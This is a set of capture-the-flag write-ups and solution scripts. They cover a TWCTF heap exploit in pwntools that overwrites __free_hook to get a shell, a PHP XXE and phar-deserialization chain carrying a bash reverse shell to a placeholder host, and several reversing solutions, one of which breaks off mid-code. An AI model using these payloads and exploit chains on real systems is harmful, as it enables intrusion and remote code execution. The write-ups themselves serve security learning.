112 |     print(i, "Valid plaintext pairs", candidates, len(candidates))
113 |     print(i, "--------------- Valid for current are only", set([x[0] for x in candidates]))
114 |     cand2.append(candidates)
115 | 
116 | print(cand2)
117 | 
118 | 
119 | # TWCTF{8d560108444cc360374ef54433d218e9_for_the_first_time_in_9_years!}


--------------------------------------------------------------------------------
/2017/HackIT-rev150.md:
--------------------------------------------------------------------------------
  1 | # Rev150 - Broken Packer
  2 | 
  3 | **Description:** Looks like this packer can not unpack what has been packed :( There are 2 mistakes in unpacking procedure. It leads to the error. Try to fix unpacker and figure out what is inside.
  4 | 
  5 | We had two ELF binaries, a packer and a packed file.
  6 | ```
  7 | user@ubuntu:~/Schreibtisch/ITCTF$ file packer
  8 | packer: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=83a5497803c94765ad5b256de346473b64f36459, not stripped
  9 | 
 10 | user@ubuntu:~/Schreibtisch/ITCTF$ file packed
 11 | packed: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=cdc378f63011a71a8d0f096c6435765db04cbc0c, not stripped
 12 | ```
 13 | Lets take a look at the packer routines first and fire up IDA. I'm not that used to the ELF headers, so I might miss some parts here... The packer basically preforms this actions:
 14 |  * Create a random key
 15 |  * XOR all the executable code with the key
 16 |  * Add a section with asm to decrypt the encrypted code
 17 |  * Store the start of the executable code, end of the executable code and the XOR key in the file
 18 |  * Change the EntryPoint to the new EP in the generated section 
 19 | 
 20 | In *disguise_text()* we find:
 21 | ```
 22 |     key = get_random_key();
 23 |     for ( i = 0LL; i < v5; ++i )
 24 |     {
 25 |       *(_BYTE *)(startOfCode + i) ^= key;
 26 |       v3 = rotate_right(v3); // = __ROR8__(v7, 8);
 27 |     }
 28 | ```
 29 | The code injected in *create_section()* though looks like this (entry_loader):
 30 | ```
 31 | v4 = info_addr;
 32 | v5 = info_start;
 33 | do
 34 |   {
 35 |   *(_BYTE *)v5 ^= v5;
 36 |   v5 = __ROR8__(v5, 8);
 37 |   v4 += 2LL;
 38 | }
 39 | while ( v4 != info_addr + info_size );
 40 | ```
 41 | Acctually two things fail here:
 42 |  * The loader adds +=2 to the offset index, not 1 as intented
 43 |  * The pointer to the encrypted segment is wrong (turns out to be wrong register)
 44 | 
 45 | If you look at in the actual packed file we notice the 3 stored values first:
 46 | ```
 47 | seg023:00000000006B54A4 qword_6B54A4    dq 49A4E28A75143878h    => XOR KEY
 48 | seg023:00000000006B54AC off_6B54AC      dq offset sub_4003B0    => Start of executable code
 49 | seg023:00000000006B54B4 qword_6B54B4    dq 88C17h               => Length of executable code
 50 | ```
 51 | So lets fix the assembly code in the packed file:
 52 | ```
 53 | mov     rax, cs:off_6B54AC => start of code
 54 | [...]
 55 | xor     [rdx], dl => Change to [rax],dl
 56 | ror     rdx, 8
 57 | add     rax, 2 => Change to 1
 58 | cmp     rax, rcx
 59 | jnz     short loc_6B5489
 60 | [...]
 61 | jmp     near ptr qword_400990 => JMP OEP
 62 | ```
 63 | Patch the file and let the encryption run, dump the process and/or apply the encryption by hand. No matter what you get the decrypted code stored in the packed assembly. Save the file and apply a simple JMP OEP at the start.
 64 | 
 65 | When starting the patched, unpacked binary we get a nice text:
 66 | ```The hardest part is overcome.```
 67 | But still the programm crashes immediatly with an invalid write operation from 0x00 memory right after this output. Wierd, it took me a while to figure out whats going on. Take a look at the callstack and see what function called the crashing function:
 68 | ```
 69 | gdb-peda$ bt
 70 | #0  0x000000000042194a in ?? ()
 71 | #1  0x0000000000400bde in ?? ()
 72 | ```
 73 | ```
 74 | .text:0000000000400BB8                 lea     rdi, aTheHardestPart ; "The hardest part is overcome."
 75 | .text:0000000000400BBF                 call    sub_407FC0 => print string
 76 | .text:0000000000400BC4                 mov     rax, [rbp+var_10]
 77 | .text:0000000000400BC8                 add     rax, 8
 78 | .text:0000000000400BCC                 mov     rax, [rax]
 79 | .text:0000000000400BCF                 lea     rsi, aCryp      ; "cryp"
 80 | .text:0000000000400BD6                 mov     rdi, rax
 81 | .text:0000000000400BD9                 call    sub_400370 => encryption function ??
 82 | .text:0000000000400BDE                 test    eax, eax
 83 | .text:0000000000400BE0                 jnz     short loc_400BF5
 84 | .text:0000000000400BE2                 mov     rax, [rbp+var_10]
 85 | .text:0000000000400BE6                 add     rax, 10h
 86 | .text:0000000000400BEA                 mov     rax, [rax]
 87 | .text:0000000000400BED                 mov     rdi, rax
 88 | .text:0000000000400BF0                 call    sub_400AAE
 89 | .text:0000000000400BF5
 90 | .text:0000000000400BF5 loc_400BF5:                             ; CODE XREF: sub_400BA9+37j
 91 | .text:0000000000400BF5                 mov     rax, [rbp+var_10]
 92 | .text:0000000000400BF9                 add     rax, 8
 93 | .text:0000000000400BFD                 mov     rax, [rax]
 94 | .text:0000000000400C00                 lea     rsi, aDecr      ; "decr"
 95 | .text:0000000000400C07                 mov     rdi, rax 
 96 | .text:0000000000400C0A                 call    sub_400370 => decryption function ??
 97 | .text:0000000000400C11                 jnz     short loc_400C18
 98 | .text:0000000000400C13                 call    sub_400B39 => XOR Function
 99 | ```
100 | Looks like some crypting and decrypting is going on. Lets call the program with arguments "cryp" or "decr". With "decr" as argument the program exits normally, so lets break after the "decrypt" function. It turns out that its not interesting, the next function is tough! It performs some XOR on a string:
101 | ```
102 |  for ( i = (signed int)result; i >= 0; --i )
103 |   {
104 |     result = aXEIBNuuDcMP_no;
105 |     aXEIBNuuDcMP_no[i] ^= aXEIBNuuDcMP_no[v1 - 1 - i] ^ 0x80;
106 |   }
107 |   ```
108 | Looking at the registers after the function was executed, the flag was in RDI (it was deleted from RAX intentionally before the function was left ).
109 | 
110 | Flag: h4ck1t{mor0ns_rel1es_on_p4ck3r5_vari0rs_d03sn0t}


--------------------------------------------------------------------------------
/2019/midnightsunctf/rubenscube/rubenscube.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | tags: ["php", "web", "xxe", "phar"]
  3 | author: "bennofs"
  4 | ---
  5 | # Challenge
  6 | > Sharing is caring. For picture wizard use only. 
  7 | 
  8 | The challenge provides a simple upload service, where you can upload images and they are added to your gallery.
  9 | 
 10 | # Solution
 11 | The robots.txt hints that the source can be downloaded from http://ruben-01.play.midnightsunctf.se:8080/source.zip.
 12 | The important file is `upload.php`:
 13 | 
 14 | ```php
 15 | <?php
 16 | session_start();
 17 | 
 18 | function calcImageSize($file, $mime_type) {
 19 |     if ($mime_type == "image/png"||$mime_type == "image/jpeg") {
 20 |         $stats = getimagesize($file);  // Doesn't work for svg...
 21 |         $width = $stats[0];
 22 |         $height = $stats[1];
 23 |     } else {
 24 |         $xmlfile = file_get_contents($file);
 25 |         $dom = new DOMDocument();
 26 |         $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
 27 |         $svg = simplexml_import_dom($dom);
 28 |         $attrs = $svg->attributes();
 29 |         $width = (int) $attrs->width;
 30 |         $height = (int) $attrs->height;
 31 |     }
 32 |     return [$width, $height];
 33 | }
 34 | 
 35 | 
 36 | class Image {
 37 | 
 38 |     function __construct($tmp_name)
 39 |     {
 40 |         $allowed_formats = [
 41 |             "image/png" => "png",
 42 |             "image/jpeg" => "jpg",
 43 |             "image/svg+xml" => "svg"
 44 |         ];
 45 |         $this->tmp_name = $tmp_name;
 46 |         $this->mime_type = mime_content_type($tmp_name);
 47 | 
 48 |         if (!array_key_exists($this->mime_type, $allowed_formats)) {
 49 |             // I'd rather 500 with pride than 200 without security
 50 |             die("Invalid Image Format!");
 51 |         }
 52 | 
 53 |         $size = calcImageSize($tmp_name, $this->mime_type);
 54 |         if ($size[0] * $size[1] > 1337 * 1337) {
 55 |             die("Image too big!");
 56 |         }
 57 | 
 58 |         $this->extension = "." . $allowed_formats[$this->mime_type];
 59 |         $this->file_name = sha1(random_bytes(20));
 60 |         $this->folder = $file_path = "images/" . session_id() . "/";
 61 |     }
 62 | 
 63 |     function create_thumb() {
 64 |         $file_path = $this->folder . $this->file_name . $this->extension;
 65 |         $thumb_path = $this->folder . $this->file_name . "_thumb.jpg";
 66 |         system('convert ' . $file_path . " -resize 200x200! " . $thumb_path);
 67 |     }
 68 | 
 69 |     function __destruct()
 70 |     {
 71 |         if (!file_exists($this->folder)){
 72 |             mkdir($this->folder);
 73 |         }
 74 |         $file_dst = $this->folder . $this->file_name . $this->extension;
 75 |         move_uploaded_file($this->tmp_name, $file_dst);
 76 |         $this->create_thumb();
 77 |     }
 78 | }
 79 | 
 80 | new Image($_FILES['image']['tmp_name']);
 81 | header('Location: index.php');
 82 | ```
 83 | 
 84 | We see that it supports XML upload, and is vulnerable to XXE injection because it sets the flag `LIBXML_NOENT` (which is badly named: this flag *enables* entity processing). But this alone doesn't help us much since we don't know the name of the flag file and we also cannot observe the output after entities have been processed. 
 85 | 
 86 | To gain arbitrary code execution, we make us of the fact that the class `Image` calls `system` during `__destruct`, where some of the parameters passed to `system` are derived from class attributes. Because the XML is parsed by PHP, we can use the `phar://` protocol handler which is known to provide php deserialization (see [1]). Thus we can build a malicious PHAR file (using the tool at [2] to make a PHAR that is also a valid JPEG) which causes an instance of the class `Image` to be created with our command injection payload. We then upload this PHAR to the server and obtain the URL (`images/...`). To trigger the RCE we afterwards upload an xml which uses XXE to load `phar://images/...` thus executing our deserialization payload.
 87 | 
 88 | One small difficulty here was in building the polyglot. The problem is that while the PHAR we generate is a valid jpeg, `file` (and `php_mime`) detect it as `tar` because it has higher precedence. We can solve this slightly corrupting the tar file in a way such that `file` no longer detects it but php can still load it. This is possible because PHP parses the checksum differently from file. The char checksum is an 7-digit octal number. If there is any non-octal digit in that number, file will parse the checksum as -1 while PHP returns the checksum it parsed so far. So if we just modify our checksum from "0001234" to "001234x" the file thinks the checksum is invalid while PHP parses the file just fine. A patch that implements this in PHPGGC can be found at [3].
 89 | 
 90 | With that patch, we can generate our polyglot PHAR as follows:
 91 | 
 92 | ```php
 93 | <?php
 94 | include("./phpggc/lib/PHPGGC.php");
 95 | 
 96 | class Image {
 97 | };
 98 | $object = new Image;
 99 | $object->folder="`bash -c 'bash -i >& /dev/tcp/MYDOMAIN.COM/1337 0>&1' >images/h 2>&1`";
100 | $object->file_name="idc";
101 | $object->extension="idc";
102 | $object->tmp_name="idc";
103 | 
104 | $serialized = serialize($object);
105 | $jpeg="./empty.jpg";
106 | $phar = new \PHPGGC\Phar\Tar($serialized, compact("jpeg"));
107 | file_put_contents('exploit.tar', $phar->generate());
108 | ?>
109 | ```
110 | 
111 | Then upload `exploit.tar`, get the URL to it and upload the following XML file:
112 | 
113 | ```xml
114 | <?xml version="1.0" encoding="ISO-8859-1"?>
115 | <!DOCTYPE foo [ <!ELEMENT foo ANY >
116 | <!ENTITY xxe SYSTEM "phar://images/path_to_exploit_image.jpg/test.txt" >]>
117 | <svg width="100" height="100">
118 |     <user>&xxe;</user>
119 |     <pass>mypass</pass>
120 | </svg>
121 | 
122 | ```
123 | 
124 | And we get a shell, which we can use to obtain the flag: `midnight{R3lying_0n_PHP_4lw45_W0rKs}`
125 | 
126 | # References
127 | - [1] https://github.com/s-n-t/presentations/raw/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It-wp.pdf
128 | - [2] https://github.com/ambionics/phpggc
129 | - [3] https://github.com/ambionics/phpggc/pull/48
130 | 
131 | 
132 | 
133 | 


--------------------------------------------------------------------------------
/2017/HackIT-rev300.md:
--------------------------------------------------------------------------------
  1 | # Rev300 - APIServer
  2 | 
  3 | **Description:** Client can access the API server. Try to login as an admin who is used to use the same passwords everywhere.
  4 | 
  5 | Another APK, but harder (= native code :D). Only 4 teams in total solved this task! It looks like a simple API where you can register users and retrieve information about the API. All the messages are send via POST and signed with a signature. So far so good, lets take a sniff with Wireshark:
  6 | 
  7 | **Register**
  8 | ```
  9 | POST /api/register HTTP/1.1
 10 | Content-Type: text/plain; charset=utf-8
 11 | Content-Length: 102
 12 | Host: 195.88.243.197:8060
 13 | [...]
 14 | sig_body=f8c13266314f9f7f989e3b49d0be30eac0969f24d9a0d9698a965a7efaca1a69.name%3Duser%26&sig_version=4
 15 | 
 16 | HTTP/1.1 200 OK
 17 | [...}
 18 | Server: H4CK1TServer/v2017.08
 19 | 
 20 | personal_key=h4ck1t48bb6e862e54f2a795ffc4e541caed4d
 21 | ```
 22 | **Info**
 23 | ```
 24 | POST /api/info HTTP/1.1
 25 | [...]
 26 | sig_body=b3a8db7e1ec33b1802d02610db62878c9c7337efac479e1e461ec896f6d43d2a.personal_key%3Dh4ck1t48bb6e862e54f2a795ffc4e541caed4d%26&sig_version=4
 27 | 
 28 | HTTP/1.1 200 OK
 29 | [...]
 30 | Server: H4CK1TServer/v2017.08
 31 | 
 32 | 1) method=register, params=[name : 'your name'] = personal_key
 33 | 2) method=info, params=[personal_key : 'your registration key' = TEXT]
 34 | 3) method=login_admin, params=[hex_password : 'My password in HEX. Im stupid admin and use a SINGLE password everywhere :)']
 35 | ```
 36 | The Android app only implements register and info. We get a big hint here: the admin uses the same password everywhere!
 37 | 
 38 | Lets dive into reversing: The Java client has a function "buildPostArgs()" which iterates all the post parameters, concats and signs them:
 39 | ```
 40 | // buildPostArgs()
 41 |     // str1 holds all the post args in one string
 42 |     byte[] arrayOfByte = MainActivity.signature(str1.getBytes());
 43 |     try
 44 |     {
 45 |       Object[] arrayOfObject = new Object[2];
 46 |       arrayOfObject[0] = new String(Hex.encodeHex(arrayOfByte));
 47 |       arrayOfObject[1] = URLEncoder.encode(str1, "UTF-8");
 48 |       String str3 = String.format("%s.%s", arrayOfObject);
 49 |       str2 = str3;
 50 |       return String.format("sig_body=%s&sig_version=4", new Object[] { str2 });
 51 |     }x
 52 | ```
 53 | The "signature" function is implemented via JNI, so we load the [libsignatures.so]() in IDA.
 54 | ```
 55 |   v3 = a1;
 56 |   v4 = a3;
 57 |   operator new[](0x20u);
 58 |   v5 = (*(int (__fastcall **)(int, int))(*(_DWORD *)v3 + 684))(v3, v4);
 59 |   v6 = v5;
 60 |   if ( (signed int)v5 <= -1 )
 61 |     v5 = -1;
 62 |   v7 = operator new[](v5);
 63 |   (*(void (__fastcall **)(int, int, _DWORD, unsigned int))(*(_DWORD *)v3 + 800))(v3, v4, 0, v6);
 64 |   v8 = sub_4660();
 65 |   v9 = v8;
 66 |   *(_DWORD *)v8 = 'kc4h';
 67 |   *(_WORD *)(v8 + 4) = 't1';
 68 |   v10 = (*(int (__fastcall **)(int, int))(*(_DWORD *)v3 + 684))(v3, v4);
 69 |   sub_485C(v7, v10, v9, 40);
 70 |   v11 = (*(int (__fastcall **)(int, signed int))(*(_DWORD *)v3 + 704))(v3, 32);
 71 |   (*(void (__fastcall **)(int, int, _DWORD, signed int))(*(_DWORD *)v3 + 832))(v3, v11, 0, 32);
 72 |   return v11;
 73 | ```
 74 | Quite confusing, isn't it? Lets clean this mess up:
 75 | ```
 76 |   v3 = a1;
 77 |   v4 = a3;
 78 |   operator new[](0x20u);
 79 |   length = strlen(javastring)
 80 |   argumentString =  new char[](length);
 81 |   v8 = copyJNIStringToCString(javastring)
 82 |   
 83 |   // Wierd function we know nothing about !
 84 |   v9 = sub_4660();
 85 |   
 86 |   v10 = v9; // Signature bytes ? 
 87 |   *(_DWORD *)v9 = 'kc4h'; // FIll the first chars with h4ck1t
 88 |   *(_WORD *)(v9 + 4) = 't1';
 89 |   
 90 |   // No idea
 91 |   v11 = (*(int (__fastcall **)(int, int))(*(_DWORD *)v3 + 684))(v3, v4);
 92 |   
 93 |   // Actual signing
 94 |   sub_485C(argumentString, v11, v10, 40);
 95 |   
 96 |   // Copy native bytes to Java Byte Array, etc...
 97 |   v12 = (*(int (__fastcall **)(int, signed int))(*(_DWORD *)v3 + 704))(v3, 32);
 98 |   (*(void (__fastcall **)(int, int, _DWORD, signed int))(*(_DWORD *)v3 + 832))(v3, v12, 0, 32);
 99 |   return v12;
100 | ```
101 | A little bit better, but still no idea how the signature is produced. IDA comes with a great Android GDB server and I even rooted my phone for this challenge. After some tracing around in the library you pretty fast get lost. There are basicly two signing functions that are applied to certain memory regions with static input data and offsets. 
102 | 
103 | So what about this wierd sub_4660 function ? It takes no argument, altough it computes something... And it applies some XOR to a static memory string! And its used by the signature function!! Lets image a signing function as sign(inputBuffer, outputBuffer, key) , then v9 = v10 matches the key ! And the key starts with h4ck1t! It was a plain guess, but it was worth a try. So i dumped the memory of v9 after it was decrypted and stored it as hex string:
104 | 
105 | ```
106 | 6834636B31741E301EE91B1CEC1EEFEE1CE919F436F4E9E925EF261BE8ED1B29F4ED1E1C191F1B1B
107 | ```
108 | 
109 | Next I sent it in as hex string to login_admin. But the request was refused (of course) since we had no signature for this certain post parameters. Replacing the input of the signature-function via the IDA debugger didn't work, so i simply patched the smali code to sign this certain message for me:
110 | ```
111 |  const-string v1, "name"
112 |  iget-object v2, p0, Lanative/hackit2017/com/apiclient/Api$1;->val$name:Ljava/lang/String;
113 | 
114 | .line 18
115 | invoke-virtual {v0, v1, v2}, Lanative/hackit2017/com/apiclient/Client;->addPost(Ljava/lang/String;Ljava/lang/String;)Lanative/hackit2017/com/apiclient/Client;
116 | ```
117 | PATCHED TO:
118 | ```
119 | const-string v1, "hex_password"
120 | const-string v2, "6834636B31741E301EE91B1CEC1EEFEE1CE919F436F4E9E925EF261BE8ED1B29F4ED1E1C191F1B1B"
121 | 
122 | .line 18
123 | invoke-virtual {v0, v1, v2}, Lanative/hackit2017/com/apiclient/Client;->addPost(Ljava/lang/String;Ljava/lang/String;)Lanative/hackit2017/com/apiclient/Client;
124 | ```
125 | So the next time i triggered "register" on the installed and modified app, the post message was signed. Without any big hope I send it via curl and had a good laugh when it was right at the first try!
126 | ```
127 | user@ubuntu:~/Schreibtisch/ITCTF/lab1$ curl -X POST http://195.88.243.197:8060/api/login_admin --data "sig_body=45cb847e3bafe29b044276b2c23532162c690516ea1e7e3398accb525ba41082.hex_password%3D6834636B31741E301EE91B1CEC1EEFEE1CE919F436F4E9E925EF261BE8ED1B29F4ED1E1C191F1B1B%26&sig_version=4"
128 | flag=h4ck1t{wH3n_u_trY_t0_h1d3_smTh_b3_r34dY_f0r_d1sc10sur3}
129 | ```
130 | 
131 | Flag: h4ck1t{wH3n_u_trY_t0_h1d3_smTh_b3_r34dY_f0r_d1sc10sur3}
132 | 
133 | 


--------------------------------------------------------------------------------
/2020/twctf/nono/script.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | from pwn import *
  3 | from ctypes import *
  4 | import sys
  5 | 
  6 | # Path to the binary
  7 | exe = ELF("./nono")
  8 | context.binary = exe
  9 | 
 10 | 
 11 | p = None
 12 | def connect():
 13 |     global p, libc, libc_offset
 14 | 
 15 |     if p is not None:
 16 |         p.close()
 17 | 
 18 |     if args.REMOTE:
 19 |         p = remote("pwn03.chal.ctf.westerns.tokyo", 22915)
 20 |         # place remote offsets here
 21 |         libc = ELF("./libc.so.6")
 22 |         libc_offset = 0x1ebbe0
 23 |     else:
 24 |         p = exe.process()
 25 |         libc = p.libc
 26 |         libc_offset = 0x1ebbe0
 27 | 
 28 |     # place local offsets here
 29 | 
 30 | ################ Wrappers ################
 31 | def play_puzzle(idx, actions):
 32 |     p.sendlineafter("Your input: ", "1")
 33 |     p.sendlineafter("Index:\n", str(idx))
 34 | 
 35 |     for x, y in actions:
 36 |         p.sendlineafter(": ", str(x) + " " + str(y))
 37 | 
 38 | 
 39 | next_idx = 2
 40 | def add_puzzle(title, size, data, pad=False, check=True):
 41 |     if not isinstance(title, bytes):
 42 |         title = title.encode()
 43 |     global next_idx
 44 |     assert len(data) <= (((size**2) >> 3) + 1)
 45 |     if pad:
 46 |         data = data.ljust(((size**2) >> 3), b'\0')
 47 |     p.sendafter("Your input: ", b"2\n" + title + b"\n" + str(size).encode() + b"\n" + data)
 48 |     p.recvline_contains("Success")
 49 | 
 50 |     next_idx += 1
 51 |     return next_idx - 1
 52 | 
 53 | def delete_puzzle(idx):
 54 |     global next_idx
 55 |     next_idx -= 1
 56 |     p.sendlineafter("Your input: ", "3")
 57 |     p.sendlineafter("Index:\n", str(idx))
 58 |     assert p.readline().strip() == b"Success"
 59 | 
 60 | def show_puzzle(idx):
 61 |     log.info("Displaying index %s" % white(hex(idx)))
 62 |     p.sendlineafter("Your input: ", "4")
 63 |     p.sendlineafter("Index:\n", idx)
 64 |     print(p.readuntil("-------------------------------------"))
 65 |     print(p.readuntil("-------------------------------------"))
 66 | 
 67 | @context.silent
 68 | def solve_leak(idx, known_bits):
 69 |     #known_bits = [0,0,0,0]
 70 |     add_puzzle("leak", 92, b"\x00"*0x400)
 71 | 
 72 |     p.sendlineafter("Your input: ", "1")
 73 |     p.sendlineafter("Index:\n", str(idx))
 74 |     p.recvline_contains("Row's Numbers")
 75 | 
 76 |     row_numbers = [int(x.strip(b",")) for x in p.readuntil("\nColumn's Numbers\n", drop=True).split()]
 77 |     p.recvline_contains("Current Status")
 78 | 
 79 |     common = row_numbers[52:68] + row_numbers[32:40]
 80 |     common = common + [a - b for a,b in zip(row_numbers[76:88], known_bits + common[:8])]
 81 |     assert len(common) == 36
 82 | 
 83 |     beg_low = [a - b for a, b in zip(row_numbers[4:16], common[16:28])]
 84 |     end_low = [a - b for a, b in zip(row_numbers[68:80], common[16:28])]
 85 |     cap_low = [a - b for a, b in zip(row_numbers[40:52], common[-12:])]
 86 |     zeros = [0] * 16
 87 |     assert len(beg_low) == 12
 88 |     assert len(end_low) == 12
 89 |     assert len(cap_low) == 12
 90 | 
 91 |     beg_bits = beg_low + common + zeros
 92 |     end_bits = end_low + common + zeros
 93 |     cap_bits = cap_low + common + zeros
 94 | 
 95 |     actions = [(i, 89) for i, v in enumerate([0] * 4 + beg_bits + end_bits[:24]) if v]
 96 |     actions += [(i, 90) for i, v in enumerate(common[12:] + zeros + cap_bits[:52]) if v]
 97 | 
 98 |     p.sendlineafter(":", "".join(str(x) + " " + str(y) + "\n" for x, y in actions))
 99 |     p.recvline_contains("Congratz!")
100 | 
101 |     return u64(decode_int64(beg_bits)), u64(decode_int64(end_bits)), u64(decode_int64(cap_bits))
102 | 
103 | def leak_everything():
104 |     pass
105 | 
106 | def get_leak():
107 |     p.sendlineafter("Your input: ", "4")
108 |     p.recvuntil("(x)\n2 : ")
109 |     data = p.recvuntil(" (o)\n3 : write (x)", drop=True)
110 |     p.sendlineafter("Index:\n", "-4")
111 | 
112 |     return data
113 | 
114 | 
115 | def write_puzzleptr_to(addr, base=None):
116 |     add_puzzle("write", 92, flat({
117 |         0x400: [addr, addr, addr + 8]
118 |     }, filler=b"\0"))
119 |     delete_puzzle(0)
120 |     if base:
121 |         add_puzzle("write", 92, flat({
122 |             0x400: [base, base + 16, base + 24]
123 |         }, filler=b"\0"))
124 |         return
125 | 
126 |     add_puzzle("write", 92, flat({
127 |         0x400: [orig_vec_beg, orig_vec_end, orig_vec_cap]
128 |     }, filler=b"\0"))
129 | 
130 | ################## Exploit Stage 1: <Explain what I'm doing here> ##################
131 | 
132 | def decode_int64(numbers):
133 |     out = b""
134 |     for i in range(0, 64, 8):
135 |         bits = "".join(str(x) for x in numbers[i:i+8][::-1])
136 |         out += bytes([int(bits, 2)])
137 |     return out
138 | 
139 | connect()
140 | 
141 | pad = 0
142 | for i in range(pad):
143 |     add_puzzle("pad" + str(i), 8, "\x00"*8)
144 | beg, end, cap = solve_leak(2 + pad, known_bits=[1]*4)
145 | info("%#x %#x %#x", beg, end, cap)
146 | 
147 | orig_vec_beg = beg + 0x490
148 | orig_vec_end = beg + 0x4a8
149 | orig_vec_cap = beg + 0x4b0
150 | 
151 | string_addr = beg + 0x30
152 | info("string_addr %#x", string_addr)
153 | write_puzzleptr_to(string_addr + 4)
154 | write_puzzleptr_to(string_addr)
155 | 
156 | for i in range(10):
157 |     add_puzzle("tofree" + str(i), 1, b"\x01")
158 | 
159 | for _ in range(10):
160 |     delete_puzzle(4)
161 | 
162 | 
163 | # while True:
164 | #     connect()
165 | #     print("solve leak")
166 | #     ptr = solve_leak(2)
167 | #     if ptr:
168 | #         break
169 | 
170 | #info("leak %#x", ptr)
171 | 
172 | 
173 | leak_data = get_leak()
174 | print(hexdump(leak_data))
175 | libc_ptr = u64(leak_data[0x4f50:0x4f50+8])
176 | libc.address = libc_ptr - libc_offset
177 | info("libc_ptr %#x base %#x", libc_ptr, libc.address)
178 | 
179 | for i in range(10):
180 |     add_puzzle("claimed" + str(i), 1, b"\x01")
181 | 
182 | for i in range(5):
183 |     add_puzzle("tcache" + str(i), 1, b"\x01")
184 | 
185 | for i in range(5):
186 |     delete_puzzle(14)
187 | 
188 | tcache_next_addr = beg + 0x12c0
189 | pause()
190 | write_puzzleptr_to(tcache_next_addr, base=beg + 0x1320)
191 | #delete_puzzle(2)
192 | delete_puzzle(2)
193 | delete_puzzle(1)
194 | delete_puzzle(0)
195 | add_puzzle(flat({
196 |     0x0: p64(libc.symbols.__free_hook),
197 | }, length=0x31), 1, b"\x01")
198 | 
199 | for _ in range(2):
200 |     add_puzzle("claim", 1, b"\x01")
201 | 
202 | pause()
203 | add_puzzle(flat({
204 |     0x0: p64(libc.address + 0x55410),
205 | }, length=0x31), 1, b"\x01", check=False)
206 | 
207 | p.sendline("")
208 | p.sendlineafter("Your input: ", "2")
209 | p.sendline("bash;test#################################################1\n\n\n\n\n")
210 | 
211 | 
212 | p.interactive()
213 | 


--------------------------------------------------------------------------------
/2017/HackIT-rev250.md:
--------------------------------------------------------------------------------
 1 | # Rev250 - Secure Messenger 
 2 | 
 3 | **Description:** Messengers are more secure nowadays. But what if they logging too much?
 4 | 
 5 | Ok it gets more interesting, only 7 teams solved this one. We had given an APK and two log files of the application, one logfile of Alice and one logfile of Bob. They basically looked like this:
 6 | 
 7 | ```
 8 |   alice/session/est/base/0624fb0d82deaa7ca92f9e2b72d48b4c07011c46dad736f6d3c7f220cda1d32b
 9 | alice/session/est
10 | alice/session/ephemeral/shared/001f29a3fd9bbf63e788fb6f39570b32ca6fa518b681b1ccaa8df0f0835b8f1d
11 | alice/session/est/base/0624fb0d82deaa7ca92f9e2b72d48b4c07011c46dad736f6d3c7f220cda1d32b
12 | alice/session/ephemeral/shared/d5bb4b7f1ad9f4a20f2c9f8fb0f63a00cabffa81165b10fe4e171d8e405eb37d
13 | alice/session/est/base/0624fb0d82deaa7ca92f9e2b72d48b4c07011c46dad736f6d3c7f220cda1d32b
14 | alice/session/ephemeral/shared/f5f7943a624467724c155ed41573d5ba1f0032fcfe2676b6ed66b8f772646f07
15 | alice/session/ephemeral/prekey/requested/public/[2094329238 : 77a759a63c9abc1f51be05cc971f7e5fa09949cda7062451ee55bdd05540a44c]
16 | alice/session/ephemeral/prekey/requested/private/6074af859b089f844e01c7c1c35a1ad174ea39dd39c0ce73981a57e3d20a6a70
17 | alice/msg/rcv/bob/enc/6312d8951609e19c54ca2f3db86b6961 -> [1]
18 | alice/session/est/base/0624fb0d82deaa7ca92f9e2b72d48b4c07011c46dad736f6d3c7f220cda1d32b
19 | alice/session/ephemeral/prekey/requested/public/[1869677971 : e6eed22b5f5fa59de8d8e0b736bfd572f2d49952ccff07b2aaeefb7271141d77]
20 | alice/session/ephemeral/prekey/requested/private/68783b882f3463a512b11a6bab3bfb87aeeef749357d4bfa8b6a656857d0b873
21 | alice/msg/rcv/bob/enc/eee70b4f327fe0a2faa9944c360210ab -> [2] 
22 | [...]
23 | ```
24 | 
25 | We can see that some information is leaked, like a private and public key and some "shared" key.
26 | 
27 | Anyways, start Android decompiling as always: Get the jar via dex2jar and extract the apk with apktool as well. Dex2Jar isn't reliable at all and we have to use the smali code later to figure out invalid Java code. I also ran the apk trough [DeGuard](http://apk-deguard.com/) to resolve some of the obfuscated class names (the tool's not very good at it, but sometimes you get an idea what the class might be).
28 | 
29 | Anyway, hands on the decompiled sources! They are acctually pretty confusing, so I did some renaming at first. The 3 main classes are:
30 |  * Participant => Acts as one person in the encrypted conversation and holds its own public/private keypair. Also stores the encrypted session to other participants
31 |  * EncryptedSession => Encrypts and decrypts messages with a participant using a agreement on Curve25519 and AES with SHA256HMAC
32 |  * ECKey => An encrypted message with some public key, private key and seed value
33 | 
34 | Lets trace the log file calls and assume the client's view is "Alice" (it acctually is! :D). "session/est/base/" is logged when a new EncryptedSession to a participant you havn't talked to yet is established. The value logged is the Curve25519 Agreement based on the public key of "Bob" and our own private key of "Alice". This agreement is used for all encryption later on, so it remains the same (and shows up quite often in the log).
35 | 
36 | "ephemeral/shared/" is used when a message encryption from Alice to Bob happens. Its again an agreement via Curve25519 and public/private key. But this time a new keypair for this message is generated, lets call it KP_MSG. In the encrypt function another keypair is generated, lets call this KP_ENC. The agreement is performed on the public key KP_MSG and private key KP_ENC, this agreement is logged again. KP_MSG is logged as well (requested/public/ and requested/private).
37 | 
38 | The last logtype is "msg/rcv/" which logs the message ID. 
39 | 
40 | Man so, many key pairs and agreements. And some of the keys are leaked, but the leakage of all the public/private keys is actually a false flag.
41 | 
42 | Lets take a close look to the encryption function:
43 | ```
44 | public ECKey encryptData(StringStorage paramStringStorage, PublicKeyStorage paramPublicKeyStorage)
45 |   {
46 |     Curve25519 curve25519Obj = Curve25519.get("best");
47 |     Curve25519KeyPair localCurve25519KeyPair = curve25519Obj.generateKeyPair();
48 |     byte[] agreement = ((Curve25519)curve25519Obj).calculateAgreement(paramPublicKeyStorage.getMSGPubKey(), localCurve25519KeyPair.getPrivateKey());
49 |     Logger.add(participant1.username + "/session/ephemeral/shared/", arrayOfByte);
50 |     shiftCounter += 1L;
51 |     byte[] keyBytes = sha256Hmac(getIVShifted(shiftCounter), "WhisperSystems".getBytes(), 16);
